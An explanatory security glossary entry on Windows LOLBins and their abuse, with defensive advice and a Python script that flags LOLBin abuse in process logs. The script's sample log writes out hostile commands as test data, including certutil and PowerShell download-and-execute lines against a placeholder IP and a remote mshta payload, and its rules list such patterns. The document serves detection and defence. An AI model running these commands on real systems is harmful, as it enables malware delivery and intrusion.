What is a LOLBin?
A LOLBin (Living Off The Land Binary) is a legitimate, usually vendor-signed system executable or script that ships with the operating system for administrative or diagnostic purposes. Attackers use these files to carry out malicious activity without dropping new, suspicious files onto the system, which makes detection by file-based security controls such as traditional antivirus programs harder. One example is “certutil.exe” on Windows, which was built to manage certificates but can also fetch a file from a web server and base64-decode it, and is therefore misused to download malware.
Can you give an example of a LOLBin?
One prominent example is “powershell.exe”, a powerful administration and scripting tool on Windows. Attackers use PowerShell to execute commands, exfiltrate sensitive data or download and run malware directly in memory. Another example is “mshta.exe”, the host for HTML Applications (.hta files), which attackers use to execute malicious JavaScript or VBScript code, either inline or loaded from a remote URL.
Which LOLBins are used most frequently?
- powershell.exe: Executes scripts and automates administration. Often misused to bypass security controls, typically with an encoded command (-EncodedCommand) or a download-and-execute one-liner.
- wmic.exe: Queries and manipulates system information via WMI and can start processes locally or on remote hosts (/node:), so it is used to execute commands on multiple devices. Microsoft has deprecated it, but it is still present on most installed systems.
- mshta.exe: Runs HTML Applications and thereby executes JavaScript or VBScript from a local file, an inline script or a remote URL.
- rundll32.exe: Loads a DLL and calls one of its exported functions; attackers use it to run code from attacker-supplied DLLs or to misuse exports of legitimate system DLLs.
- certutil.exe: Manages certificates, but can also download files via HTTP (-urlcache) and encode or decode files as base64.
These tools are particularly attractive to attackers because they ship with Windows, are signed by Microsoft and are therefore trusted by default by allow-lists and reputation-based controls.
How do LOLBAS differ from conventional malware?
LOLBAS (Living Off The Land Binaries And Scripts) techniques use existing, trusted system files, whereas conventional malware is usually introduced into the system as a separate, recognisable file. Because LOLBins are part of the operating system and carry a valid vendor signature, security solutions often do not flag them as a threat. Furthermore, no additional software is installed, which leaves fewer artefacts and makes detection and forensic analysis considerably harder. Attackers can therefore operate more inconspicuously and bypass security measures that key on new or unknown files; detection has to rely on behaviour instead, i.e. on command-line arguments, parent/child process relationships and network activity of the trusted binary rather than on file hashes or signatures.
How can companies protect themselves against LOLBAS attacks?
- Monitoring and logging:
  - Record the arguments passed to a binary, not just its name: enable process-creation auditing with full command lines (Windows Security Event ID 4688 with command-line logging, or Sysmon Event ID 1) and PowerShell Script Block Logging and Module Logging (Event ID 4104).
  - Monitoring tools such as Endpoint Detection and Response (EDR) can identify anomalies in the behaviour of legitimate files, for example certutil.exe making HTTP requests or mshta.exe being started by an Office application.
- Enforce restrictions:
  - Application control (allow-listing) with AppLocker or Windows Defender Application Control: only authorised programs may be executed. Because LOLBins are signed Microsoft binaries that a default allow-list permits, rarely needed ones such as mshta.exe or wmic.exe should be explicitly blocked or restricted to administrators.
  - PowerShell should run in a restrictive configuration: Constrained Language Mode enforced through application control, and an execution policy that only allows signed scripts (AllSigned). Note that the execution policy on its own is not a security boundary (it can be bypassed with -ExecutionPolicy Bypass or by piping script text into the interpreter), so it must be combined with logging and application control.
  - Group Policies: restrict which users may use administrative tools such as PowerShell or WMI, and do not give standard users local administrator rights.
- Training and awareness:
  - IT teams should be trained to recognise typical signs of LOLBAS techniques, such as unusual command-line arguments or unexpected parent processes.
- Zero trust strategy:
  - In a zero-trust architecture no application, file or identity is trusted by default because of where it comes from; execution rights, network access and credentials are limited to what is actually needed, which bounds what a misused LOLBin can reach.
- Forensic analysis:
  - Logs collected in a SIEM (Security Information and Event Management) system can be correlated to reconstruct suspicious activity, for example a LOLBin download followed shortly by a newly created scheduled task.
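As an added example (not code from the original page or from the LOLBAS project), the following Python script runs a handful of behaviour-based detection rules over constructed process-creation log lines. It ties the command-line patterns of the frequently abused binaries listed above to the monitoring advice in this section: the rules look at arguments and at the parent process, not at the (trusted) file itself. The key=value log format, the host and user names, the IP address 198.51.100.7 and the rule set are assumptions made for the example.

```python
"""Flag typical LOLBin abuse in process-creation log lines.

Added example for this glossary entry; it is not code from the page or
from the LOLBAS project. The key=value log format below is a constructed,
simplified rendering of the fields a Windows Security Event 4688 (with
command-line auditing) or Sysmon Event ID 1 record carries: parent image,
image and full command line. Adapt parse_line() to your SIEM/EDR export.
"""
import re
from dataclasses import dataclass

# Parents that should practically never launch a LOLBin on a workstation.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}


@dataclass(frozen=True)
class Rule:
    name: str
    image: str       # executable file name, compared case-insensitively
    pattern: str     # regex applied to the command line, case-insensitively
    severity: str


# Argument patterns matching the abuse described for the binaries above.
# Illustrative, not exhaustive: real rule sets need tuning per environment.
RULES = (
    Rule("certutil_download", "certutil.exe", r"-urlcache\b.*https?://", "high"),
    Rule("certutil_decode", "certutil.exe", r"-(?:de|en)code\b", "medium"),
    Rule("mshta_remote_or_inline", "mshta.exe", r"https?://|javascript:|vbscript:", "high"),
    Rule("rundll32_script_or_url", "rundll32.exe",
         r"javascript:|url\.dll,(?:OpenURL|FileProtocolHandler)", "high"),
    Rule("powershell_encoded", "powershell.exe",
         r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\b", "high"),
    Rule("powershell_download", "powershell.exe",
         r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\biex\b", "medium"),
    Rule("wmic_process_create", "wmic.exe", r"process\s+call\s+create", "high"),
)
LOLBIN_IMAGES = {rule.image for rule in RULES}

# Assumed log format (constructed for this example).
LINE_RE = re.compile(
    r'^(?P<ts>\S+) host=(?P<host>\S+) user=(?P<user>\S+) '
    r'parent=(?P<parent>.+?) image=(?P<image>.+?) cmdline="(?P<cmd>.*)"$'
)


def parse_line(line):
    """Return a dict of fields, or None for lines that do not match the format."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["image_name"] = rec["image"].rsplit("\\", 1)[-1].lower()
    rec["parent_name"] = rec["parent"].rsplit("\\", 1)[-1].lower()
    return rec


def evaluate(rec):
    """Return (rule name, severity) pairs that fire for one parsed record."""
    hits = [(r.name, r.severity) for r in RULES
            if rec["image_name"] == r.image
            and re.search(r.pattern, rec["cmd"], re.IGNORECASE)]
    # Parent/child relationship: a LOLBin spawned by an Office application
    # is suspicious regardless of its arguments.
    if rec["image_name"] in LOLBIN_IMAGES and rec["parent_name"] in OFFICE_PARENTS:
        hits.append(("office_spawned_lolbin", "high"))
    return hits


def scan(lines):
    """Run every rule over every parsable line and collect the findings."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue        # malformed or foreign line: skip it, do not crash
        for name, severity in evaluate(rec):
            findings.append({"host": rec["host"], "user": rec["user"],
                             "rule": name, "severity": severity, "cmd": rec["cmd"]})
    return findings


def summarize(findings):
    """Count findings per severity, e.g. {'high': 6, 'medium': 1}."""
    counts = {}
    for f in findings:
        counts[f["severity"]] = counts.get(f["severity"], 0) + 1
    return counts


# Constructed sample log: benign uses of the same tools next to abusive ones.
SAMPLE_LOG = [
    r'2024-05-02T09:14:03Z host=WS-042 user=CORP\alice parent=C:\Windows\System32\cmd.exe image=C:\Windows\System32\certutil.exe cmdline="certutil.exe -verify C:\temp\server.cer"',
    r'2024-05-02T09:15:41Z host=WS-042 user=CORP\alice parent=C:\Windows\System32\cmd.exe image=C:\Windows\System32\certutil.exe cmdline="certutil.exe -urlcache -split -f http://198.51.100.7/a.exe C:\Users\Public\a.exe"',
    r'2024-05-02T09:16:02Z host=WS-017 user=CORP\bob parent=C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE image=C:\Windows\System32\mshta.exe cmdline="mshta.exe http://198.51.100.7/invoice.hta"',
    r'2024-05-02T09:17:30Z host=WS-017 user=CORP\bob parent=C:\Windows\explorer.exe image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmdline="powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"',
    r'2024-05-02T09:18:00Z host=SRV-03 user=CORP\svc_backup parent=C:\Windows\System32\svchost.exe image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmdline="powershell.exe -File C:\scripts\backup.ps1"',
    r'2024-05-02T09:19:12Z host=WS-017 user=CORP\bob parent=C:\Windows\explorer.exe image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmdline="powershell.exe -nop -c "iwr http://198.51.100.7/s.ps1 -UseBasicParsing | iex""',
    r'2024-05-02T09:20:45Z host=WS-042 user=CORP\alice parent=C:\Windows\System32\cmd.exe image=C:\Windows\System32\wbem\WMIC.exe cmdline="wmic.exe process call create "cmd /c whoami""',
    r'2024-05-02T09:21:09Z host=WS-042 user=CORP\alice parent=C:\Windows\System32\cmd.exe image=C:\Windows\System32\rundll32.exe cmdline="rundll32.exe url.dll,OpenURL http://198.51.100.7/x.hta"',
    "garbage line that does not match the format",
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"[{f['severity']}] {f['host']} {f['user']} {f['rule']}: {f['cmd']}")
    print(summarize(scan(SAMPLE_LOG)))
```

The benign certutil and PowerShell lines produce no findings, the mshta line produces two (remote .hta plus Office parent), and the malformed line is skipped rather than aborting the scan. In production the same two signals, arguments and parent process, are what EDR and SIEM correlation rules key on; the regexes here are deliberately narrow and would need extending (and tuning against your own baseline) before use.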
Are there resources to learn more about LOLBAS?
The LOLBAS project (https://lolbas-project.github.io/) is one of the most comprehensive resources for IT decision makers and security experts. It documents a large number of known Windows LOLBins, LOLLibs (Living Off The Land Libraries) and LOLScripts, including their legitimate purpose, the ways they can be abused (download, execute, bypass, persistence and so on) and, for each entry, pointers for detection and prevention.